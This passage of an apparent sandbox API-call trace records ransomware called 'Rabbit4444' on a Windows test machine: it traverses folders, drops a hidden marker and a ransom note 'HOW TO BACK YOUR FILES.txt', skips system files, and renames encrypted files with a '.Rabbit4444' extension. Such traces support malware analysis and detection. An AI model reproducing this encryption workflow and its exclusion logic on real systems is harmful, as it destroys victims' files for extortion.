(lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\SystemAppData") returned 95 [0063.543] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.543] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbed6335f, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xbed6335f, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xef30c52a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102990 [0063.543] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.543] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.543] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.543] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.543] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbed6335f, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xbed6335f, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xef30c52a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.543] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.543] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.543] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.543] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.543] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.543] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef30c52a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef30c52a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef332ae6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.543] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.543] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.543] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef30c52a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef30c52a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef332ae6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.544] FindClose (in: hFindFile=0x102990 | out: hFindFile=0x102990) returned 1 [0063.544] lstrcpyW (in: lpString1=0x130ebf8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.544] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\SystemAppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsfeedbackhub_8wekyb3d8bbwe\\systemappdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.544] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.544] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.544] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.545] CloseHandle (hObject=0x278) returned 1 [0063.545] CloseHandle (hObject=0x298) returned 1 [0063.545] GetCurrentThreadId () returned 0xd98 [0063.545] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121f88 [0063.545] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\Settings", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\Settings" [0063.545] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123500 | out: hHeap=0xe0000) returned 1 [0063.545] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121f80 | out: hHeap=0xe0000) returned 1 [0063.545] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\Settings" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\Settings" [0063.545] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\Settings", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\Settings\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\Settings\\" [0063.545] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\Settings\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3" [0063.545] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsfeedbackhub_8wekyb3d8bbwe\\settings\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.546] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.548] FlushFileBuffers (hFile=0x298) returned 1 [0063.549] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.549] CloseHandle (hObject=0x298) returned 1 [0063.551] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\Settings") returned 90 [0063.551] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.551] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbed5fe7b, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xbed69507, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xef332ae6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0063.551] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.551] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.551] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.551] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.551] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbed5fe7b, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xbed69507, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xef332ae6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.551] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.551] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.551] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.551] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.551] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.551] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef332ae6, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef332ae6, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef332ae6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.551] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.551] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.551] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbed69507, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xbed69507, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xbed69507, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0063.551] lstrcmpiW (lpString1="roaming.lock", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.551] lstrcmpiW (lpString1="roaming.lock", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.551] lstrcmpiW (lpString1="roaming.lock", lpString2="Rabbit4444.exe") returned 1 [0063.551] lstrcmpiW (lpString1="roaming.lock", lpString2=".") returned 1 [0063.551] lstrcmpiW (lpString1="roaming.lock", lpString2="..") returned 1 [0063.551] lstrcmpiW (lpString1="roaming.lock", lpString2="windows") returned -1 [0063.551] lstrcmpiW (lpString1="roaming.lock", lpString2="bootmgr") returned 1 [0063.551] lstrcmpiW (lpString1="roaming.lock", lpString2="pagefile.sys") returned 1 [0063.551] lstrcmpiW (lpString1="roaming.lock", lpString2="boot") returned 1 [0063.551] lstrcmpiW (lpString1="roaming.lock", lpString2="ids.txt") returned 1 [0063.552] lstrcmpiW (lpString1="roaming.lock", lpString2="NTUSER.DAT") returned 1 [0063.552] lstrcpyW (in: lpString1=0x130ebee, lpString2="roaming.lock" | out: lpString1="roaming.lock") returned="roaming.lock" [0063.552] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\Settings\\roaming.lock", dwFileAttributes=0x0) returned 1 [0063.552] lstrlenW (lpString="roaming.lock") returned 12 [0063.552] lstrlenW (lpString="Rabbit4444") returned 10 [0063.552] lstrcmpiW (lpString1="aming.lock", lpString2="Rabbit4444") returned -1 [0063.552] lstrlenW (lpString=".dll") returned 4 [0063.552] lstrcmpiW (lpString1="lock", lpString2=".dll") returned 1 [0063.552] lstrlenW (lpString=".lnk") returned 4 [0063.552] lstrcmpiW (lpString1="lock", lpString2=".lnk") returned 1 [0063.552] lstrlenW (lpString=".ini") returned 4 [0063.552] lstrcmpiW (lpString1="lock", lpString2=".ini") returned 1 [0063.553] lstrlenW (lpString=".sys") returned 4 [0063.553] lstrcmpiW (lpString1="lock", lpString2=".sys") returned 1 [0063.553] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbed646ee, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xbed646ee, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x55d5013a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0063.553] lstrcmpiW (lpString1="settings.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.553] lstrcmpiW (lpString1="settings.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.553] lstrcmpiW (lpString1="settings.dat", lpString2="Rabbit4444.exe") returned 1 [0063.553] lstrcmpiW (lpString1="settings.dat", lpString2=".") returned 1 [0063.553] lstrcmpiW (lpString1="settings.dat", lpString2="..") returned 1 [0063.553] lstrcmpiW (lpString1="settings.dat", lpString2="windows") returned -1 [0063.553] lstrcmpiW (lpString1="settings.dat", lpString2="bootmgr") returned 1 [0063.553] lstrcmpiW (lpString1="settings.dat", lpString2="pagefile.sys") returned 1 [0063.553] lstrcmpiW (lpString1="settings.dat", lpString2="boot") returned 1 [0063.553] lstrcmpiW (lpString1="settings.dat", lpString2="ids.txt") returned 1 [0063.553] lstrcmpiW (lpString1="settings.dat", lpString2="NTUSER.DAT") returned 1 [0063.553] lstrcpyW (in: lpString1=0x130ebee, lpString2="settings.dat" | out: lpString1="settings.dat") returned="settings.dat" [0063.553] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\Settings\\settings.dat", dwFileAttributes=0x0) returned 1 [0063.553] lstrlenW (lpString="settings.dat") returned 12 [0063.553] lstrlenW (lpString="Rabbit4444") returned 10 [0063.553] lstrcmpiW (lpString1="ttings.dat", lpString2="Rabbit4444") returned 1 [0063.553] lstrlenW (lpString=".dll") returned 4 [0063.553] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0063.553] lstrlenW (lpString=".lnk") returned 4 [0063.553] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0063.553] lstrlenW (lpString=".ini") returned 4 [0063.554] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0063.554] lstrlenW (lpString=".sys") returned 4 [0063.554] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0063.554] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsfeedbackhub_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0063.554] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0063.554] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15486471896) returned 1 [0063.554] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0063.554] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0063.554] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0063.554] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x2a0 [0063.555] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0063.557] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x123828 [0063.557] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0063.557] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123828 | out: hHeap=0xe0000) returned 1 [0063.557] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0063.557] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0063.558] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0063.558] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0063.558] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0063.558] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15486852818) returned 1 [0063.558] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0063.558] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0063.558] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.558] CloseHandle (hObject=0x2a0) returned 1 [0063.558] CloseHandle (hObject=0x278) returned 1 [0063.558] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\Settings\\settings.dat.Rabbit4444") returned 114 [0063.558] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsfeedbackhub_8wekyb3d8bbwe\\settings\\settings.dat"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\Settings\\settings.dat.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsfeedbackhub_8wekyb3d8bbwe\\settings\\settings.dat.rabbit4444"), dwFlags=0x1) returned 1 [0063.560] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbed646ee, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xbed646ee, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x55d5013a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 0 [0063.560] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0063.560] lstrcpyW (in: lpString1=0x130ebee, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.560] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\Settings\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsfeedbackhub_8wekyb3d8bbwe\\settings\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.561] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.561] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.562] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.562] CloseHandle (hObject=0x278) returned 1 [0063.563] CloseHandle (hObject=0x298) returned 1 [0063.563] GetCurrentThreadId () returned 0xd98 [0063.563] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122228 [0063.563] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\RoamingState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\RoamingState" [0063.563] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0063.563] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122220 | out: hHeap=0xe0000) returned 1 [0063.563] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\RoamingState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\RoamingState" [0063.563] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\RoamingState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\RoamingState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\RoamingState\\" [0063.563] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\RoamingState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3" [0063.563] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsfeedbackhub_8wekyb3d8bbwe\\roamingstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.564] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.566] FlushFileBuffers (hFile=0x298) returned 1 [0063.567] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.567] CloseHandle (hObject=0x298) returned 1 [0063.568] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\RoamingState") returned 94 [0063.568] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.568] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbed58391, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd1a52e58, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef3589ae, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0063.568] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.568] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.568] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.568] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.568] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbed58391, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd1a52e58, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef3589ae, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.568] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.568] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.568] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.568] 